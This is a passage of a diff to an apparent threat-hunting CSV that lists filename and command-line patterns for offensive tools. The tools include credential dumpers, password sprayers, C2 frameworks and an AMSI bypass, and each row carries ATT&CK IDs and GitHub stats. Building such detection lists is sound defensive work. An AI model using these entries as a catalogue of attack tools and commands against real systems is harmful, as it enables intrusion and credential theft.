tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*PassTheCert.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*passthecert.py -action add_computer -crt user.crt -key user.key -domain * -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*PassTheChallenge.cpp*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PassTheChallenge.exe*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" 
@@ -14536,46 +14702,46 @@ "*PasswareKitForensic_*_Setup.dmg*","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PasswareKitForensic_*_Setup.msi*","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*passware-kit-forensic-64bit.msi*","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*password = 'tdragon6'*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*password = 'tdragon6'*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*Password*Winter2017*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*password_box.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*password_cracker.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*password_crackers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*password_cracker.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*password_crackers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Password_Cracking.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"*password_prompt_spoof.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*password|passwort|passwd|*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*password_prompt_spoof.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*password|passwort|passwd|*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*PasswordBoxImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*Password-Default/service.txt*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","665","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*Password-Default/service.txt*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*passwordfox.exe*","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*passwordfox.zip*","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. 
For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*passwordfox-x64.zip*","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Passwords/Leaked-Databases*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*Passwords_in_description.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Password-Scripts*","offensive_tool_keyword","Password-Scripts","Password Scripts xploitation ","T1210 - T1555 - T1110 - T1554 - T1553","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/laconicwolf/Password-Scripts","1","0","N/A","N/A","1","98","37","2019-10-08T17:57:49Z","2017-10-20T17:17:23Z" +"*Passwords/Leaked-Databases*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Passwords_in_description.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Password-Scripts*","offensive_tool_keyword","Password-Scripts","Password Scripts xploitation ","T1210 - T1555 - T1110 - T1554 - T1553","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/laconicwolf/Password-Scripts","1","0","N/A","N/A","1","99","37","2019-10-08T17:57:49Z","2017-10-20T17:17:23Z" "*PasswordSpray *","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. 
BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!","t1110 - T1114 - T1555","TA0006 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","1498","354","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" -"*passwordspray*--user-as-pass*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*passwordspray.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*passwordSprayCmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*passwordspray*--user-as-pass*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*passwordspray.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*passwordSprayCmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "*patator ftp_login host=* user=FILE0 
0=*.txt *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*patator*","offensive_tool_keyword","patator","Patator was written out of frustration from using Hydra. Medusa. Ncrack. Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python. that strives to be more reliable and flexible than his fellow predecessors.","T1110 - T1111 - T1210 - T1558.004","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/lanjelot/patator","1","0","N/A","N/A","10","3284","776","2023-09-25T06:06:20Z","2014-08-25T00:56:21Z" "*Patch-AMSI.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" -"*patchAmsiOpenSession*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","362","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" +"*patchAmsiOpenSession*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","363","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" "*Patch-ETW.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - 
T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*Pateensy/PaensyLib/*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*--path docToDump.xls*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*path_dll_hijack.h*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","0","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*pathhijack.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*PaulSec/twittor*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","253","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*PaulSec/twittor*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","254","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" "*PayGen*python3 generate.py*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","0","N/A","N/A","","N/A","","","" "*payload start tetanus*","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","0","N/A","N/A","3","229","33","2023-05-14T21:34:20Z","2022-03-07T20:35:33Z" "*payload.c *","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation 
tools","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" "*payload.csproj*","offensive_tool_keyword","scshell","network pentestration test (shell)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*payload.sct *","offensive_tool_keyword","scshell","network pentestration test (shell)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" -"*payload/encryptor_remote.py*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*payload/encryptor_remote.py*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*payload_bootstrap_hint*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - 
